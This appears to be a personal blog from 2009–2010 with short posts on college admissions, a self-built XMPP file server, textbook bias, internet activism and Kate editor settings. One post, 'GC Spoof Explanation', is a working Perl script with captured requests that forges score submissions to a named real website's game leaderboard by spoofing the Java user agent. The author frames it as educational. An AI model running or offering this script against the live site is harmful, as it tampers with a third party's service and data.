A0u on Xanga

Sorry, the page you requested was not found. Really.

The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.

Monday, 29 March 2010

Second Estate

This series of letters is one of the instances in which I sincerely hope that such attitudes are not the norm among the topmost segments of our society.

If there is anything to be learned about college admissions, it is that one must purge any sense of entitlement from oneself. Apparently, the same well-off demographic that insists its successes are due entirely to personal merit now demand some privileges for its offspring...
In reality, though, admissions committees are never obligated to accept any particular individual. The cold fact is that there are more qualified applicants than available slots, so it follows that some people will be turned away -- it is not exactly fair, but I don't see any point in denying that it is a real possibility that can happen to anyone, including legacy applicants.

(FYI, legacy applicants already do enjoy preferential treatments of sorts, such as having their file extensively reviewed a second time by a higher-up before a final rejection is issued. This cannot be said for the "average" applicant.)

Saturday, 27 February 2010

XMPP file server
Recently, I had the curious idea of implementing a file-sharing service over XMPP (GoogleTalk). This is not as crazy as it may seem; bandwidth issues notwithstanding, there may a couple advantages over an HTTP file server:

With HTTP file transfers, the client must connect (more or less) directly to my computer. This means that (1) I must open a port in order to listen to incoming requests and (2), since I do not want to register a domain name, the client must already know my current IP address. In addition to the fact that my ISP dynamically assigns IP addresses, there are privacy and security issues associated with open ports and with my IP address essentially disclosing my geographical location.

XMPP solves these problems with a different client-server architecture:
Client (me) ↔ Server(s) ↔ {client A, client B, ...}
In other words, IM clients communicate indirectly through a server (for GoogleTalk, this is talk.google.com:5222). In this way the XMPP server acts somewhat like a proxy but with additional benefits.
- The file service is tied to an XMPP account rather than an IP address.
- Since my contacts are uniquely known by their Jabber IDs (JIDs), it is possible set access rules based on their real-life identities. The client is not exposed to untrusted contacts.
- I find XMPP generally more flexible (extensible) for multipurpose applications. For example, given built-in IM support, it becomes possible for a human user to interact with a bot through a two-way conversation. (The XMPP bot plays the role of a librarian or help-desk receptionist in answering requests and making suggestions.)
So my side project for the past week has been to implement an XMPP stack from the ground up. (No fun exists in simply using a preexisting library.)

Currently, the following features are more or less functional:
- Validating XML parser
- Complete XMPP Core (RFC 3920): stream initialization, TLS negotiation, SASL authentication
- Partial XMPP IM (RFC 3921): sending of message and presence stanzas
- SI File Transfer (XEP-0091) through In-Band Bytestreams (XEP-0047) - currently outgoing only

Thursday, 25 February 2010

Bias

Conservative bias in our AP U.S. Government textbook?
From page 588 of the ninth edition, its coverage of the global warming issue appears to diverge from that of my biology and chemistry textbooks...
I suppose that skewed perspectives are bound to result when authors attempt to write outside their area of expertise.

Perhaps this is the reason why Mr. B. advised us to be skeptical of this textbook.

Monday, 22 February 2010

This is why we can't have nice things
I was perusing through WIRED when I took notice of one particular advertisement publicizing Internet For Peace, a group who apparently wants to nominate the Internet (and its users) for the next Nobel Peace Prize.

Immediately I thought, Yup, /b/ and 4chan certainly deserve a Nobel Peace Prize.

The ad states:
"Day in and day out, we have a weapon* in our hands. Very powerful. A weapon of mass construction ... The largest meeting place ever known, where communication and interaction reign and proliferate."
(* an odd word choice for something that supposedly promotes peace... )

Does this not perfectly describe /b/, the greatest testament to users' abilities of self-organization, creativity, and decisive activism? For all its political incorrectness, 4chan may actually be one of the most inclusive and egalitarian societies (I use the term loosely) in existence. When you are Anonymous, no one can reject you based on skin color, gender, socioeconomic status, or nationality -- unless you are enough of a newf*g to reveal such information online.

Yet /b/ is also a good example of why mass communication and participation alone do not necessarily lead to greater peace.

Later in the ad:
"The most effective antidote to war and hatred has always been the meeting of minds and souls."
This is a vague statement to which history provides counterexamples. Ships have brought people into contact, but they also initiated an era of colonialism. At the first Thanksgiving in 1621, the Plymouth colony and Native Americans shared one nice meal, but they ended up killing each other over land about a year later. If there is such an "effective antidote," it wouldn't be so simple as a "get-together".

So far I am skeptical of this Peace Prize effort, partly because it is difficult to gauge the positive impact of the Internet on real life. For every "uplifting" aspect, I can name a problem that the Internet either produced or aggravated:
- Privacy violations and security concerns
- E-mail spam (which constitutes upwards of 90% of e-mail traffic)
- Cyber-bullying / Cyber-stalking
- Exchange of certain illegal materials
- Distractions in general
As a reflection of humanity, the Internet has a dark side.

Well, what about the role of the Internet during the Iranian election protests in 2009? People outside Iran did show their support for the dissidents on Twitter, which was better than remaining silent, but several months later, the real-life situation has not improved much... Yet Tweeters in general have already mostly forgot. Armchair activism is a fad that waxes and wanes.

And social networking advances dialogue? All I see in Facebook is the typical Silicon Valley libertarianism: your personal life and friendships are fair game for commercialization.

The Internet is useful for things such as open source, but it is not utopia. If anything, the Internet is merely a tool, like the public library. Simply because a tool is available does not guarantee that people will use it effectively or for long-term self-improvement. Public libraries are excellent for the exchange of information, but we have had them for a much longer time than the Internet, and the public still doesn't really seem to take an interest in becoming more informed (except, of course, when celebrity gossip is involved).

And finally:
"A Nobel that will be awarded to each one of us."
Good job, we've really deserved it.

Saturday, 20 February 2010

Semantics

The headline of the recent Oracle issue -- "Pressure results in cheating for some" -- is intriguing, first for the fact that such a sensitive topic rarely features in the front page, and also (more significantly) for its odd wording.

Compare the phrase "A results in B" with the alternative "A causes B." The latter sounds noticeably harsher and more blunt. On the other hand, "A results in B" almost reads as if B occurs as a side effect of A, rather than as a direct consequence.

However, what really makes the wording seem awkward is the grafting of the phrase "for some" onto the end. This is a rather indirect way of connecting the action to the actor, because one could interpret it as removing some intent from the part of the cheater (for example, "For me, the situation resulted in cheating" versus "I cheated in this situation").
Of course, "for some" could plausibly have been meant as a cautious qualifier. If it were omitted, "Pressure results in cheating" could be misconstrued as (falsely) suggesting that pressure generally leads to cheating, or that cheating is more widespread than it actually is.

Nevertheless, I wondered why the headline was not instead "Pressure causes some to cheat," which would have been the grammatically clearer (and logical?) alternative.
Was the newspaper attempting to tone down the language? It is true that this version is potentially more inflammatory because it establishes a more direct and stronger connection between pressure and cheating.
Perhaps this is to avoid running afoul of the administration (who has a record of censorship): Given that pressure is a well-known facet of Troy culture, placing the blame on pressure might be seen as criticizing the administration for cultivating such an atmosphere. The article does come awfully close to that...

Well, what do you think?

Friday, 05 February 2010

English

English -- do you speak it?!
Oh, the orthographic irony...
I could not resist.

Wednesday, 06 January 2010

GC Spoof Explanation
Some people have asked me about this, so…
SYNOPSIS: Manipulate the Guess Correlation leaderboard through a spoofing attack

Introduction
The source code of the game can be obtained by decompiling the bytecode of the Java applet (gcjapplet.jar). Given this, the basic strategy is to reverse engineer client-server communications and then falsify a score submission. An examination of the source reveals that all answer-checking and score-keeping occurs on the client-side; most importantly, the server does not directly verify the score and performs only minimal input checks. Interactions with the server accomplish two peripheral functions:
- GCJApplet.getTarget(): Retrieve some data during GCJApplet.init(), including a unique ID number assigned to the session
- GCJApplet.sendScore(): Submit the score if the player's winning streak equals or exceeds the minimum score on the leaderboard
Thus, manipulation of the leaderboard requires mimicking these HTTP POST requests ordinarily sent by the applet. There are two corresponding server-side scripts: /gett/gettarget.php and /gett/acceptscore.php.
As an example, the following is a genuine HTTP request message from GCJApplet.getTarget(), captured by Wireshark:
POST /gett/gettarget.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache User-Agent: Java(tm) 2 SDK, Standard Edition v1.6.0_0 Java/1.6.0_0 Host: www.istics.net Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 15 group_id=world&
Note that forging the User-Agent header is necessary, since the server-side scripts do nothing unless the user agent is identified as Java. The last line contains the message content: URL-encoded key-value pairs that form the query, which are passed as arguments to the script specified by the URI (in this case, /gett/gettarget.php).
Exploit Script
This is an overview of the exploit script, which is written in Perl.
First, a few useful subroutines must be defined.
remote() opens a socket to the remote host (www.istics.net:80) and returns a reference to the IO object. (Consult perlipc for more detailed information about Internet sockets.)
```
# Begin snippet
use IO::Socket::INET;
sub remote {
	my $sock = IO::Socket::INET->new(
		PeerAddr => 'www.istics.net',
		PeerPort => 'http(80)',
		Proto => 'tcp') || die("Cannot connect to host: $!");
	$sock->autoflush(1);
	return $sock;
}
# End snippet
```
request() constructs a POST request string given a script name and message content. Note the use of the Internet line terminator, which consists of a carriage return and line feed. An empty line must separate the headers and the content.
```
# Begin snippet
sub request {
	my $EOL = "\015\012";
	return join('',
		'POST /gett/', $_[0], ' HTTP/1.1', $EOL,
		'Host: www.istics.net', $EOL,
		'User-Agent: Java(tm) 2 SDK, Standard Edition v1.6.0_0 Java/1.6.0_0', $EOL,
		'Content-Type: application/x-www-form-urlencoded', $EOL,
		'Content-Length: ', length($_[1]), $EOL x 2, $_[1]
	);
}
# End snippet
```
Step 1: Get Target
/gett/gettarget.php requires one parameter: group_id. It responds with a comma-separated list of four numerical values (e.g., 50, 10, 78, 676651):
- show_top: number of distinct scores shown on the leaderboard
- min_score: (purpose unknown, but does not matter)
- target_score: threshold score to beat in order to secure a spot on the leaderboard
- number: unique ID assigned by the server at the beginning of the game
Sending the request essentially consists of printing the message to the appropriate socket.
Only number is actually needed for the score submission; note that a regular expression (a Perl strength) is used to extract that value.
```
# Begin snippet
use strict;
use URI::Escape;

my ($group, $score, $name) = ('prod10', 1337, 'The Albert');  # Define submission info

my $sock = remote();
print $sock request('gettarget.php', "group_id=$group");
my $number;
while (<$sock>) {
	if ( m/^\s*\d+,\s*\d+,\s*\d+,\s*(\d+)/ ) {
		$number = $1;
		last;
	}
}
close($sock);
# End snippet
```
Step 2: Send Score
/gett/acceptscore.php requires four parameters: group_id, score, name, number. It responds with an updated version of the acceptscore.php data, which can be discard by this point.
```
# Begin snippet
$sock = remote();
print $sock request('acceptscore.php', join('',
		'group_id=', $group,'&score=', $score, '&name=', uri_escape($name), '&number=', $number
	));
print while (<$sock>);
close($sock);
# End snippet
```
The code is distributed under the LGPL v3.
This information is made available for educational purposes and should not be taken as an invitation to trash the leaderboard.

Sunday, 27 December 2009

Kate single instance

I was somewhat irritated at a new instance of Kate being launched each time I clicked a file, instead of having a new tab opened in the current instance.

To correct this, edit /usr/share/applications/kde4/kate.desktop and change
Exec=kate %U
to
Exec=kate -u %U
(Tested in Kubuntu 9.10)

Saturday, 26 December 2009

Tango Schema for Kate

Kate certainly more full-featured and configurable than Gedit, but the default syntax color schema is too pastel-like for my eyes. I prefer a bit more contrast.

So I have ported the Tango scheme from Gedit. While there is still room for improvement regarding the selection colors, and some language-specific syntax remain the default, it works most of the time.

Append the following block of text to ~/.kde/share/config/katesyntaxhighlightingrc:
[Default Item Styles - Schema Tango] Alert=ff8b537f,ff8b537f,1,,,,fff0eaee,,--- Base-N Integer=ff000000,ffffffff,,,,,,,--- Character=ff5b3566,ff5b3566,,,,,,,--- Comment=ff1e4c87,ff1d4d87,,1,,,,,--- Data Type=ff529a04,ff549a03,1,,,,,,--- Decimal/Value=ff000000,ffffffff,,,,,,,--- Error=ffeeeeed,ffa40000,,,,,ffa40000,,--- Floating Point=ff000000,ffffffff,,,,,,,--- Function=ff72a0cf,ff72a0cf,0,,,,,,--- Keyword=ffa40000,ffa40000,1,,,,,,--- Normal=ff000000,ffffffff,,,,,,,--- Others=ff43662e,ff43662e,,,,,,,--- Region Marker=ff296fbe,ff296fbe,,,,,ffe8eef7,,--- String=ff8b537f,ff8b537f,,,,,,,---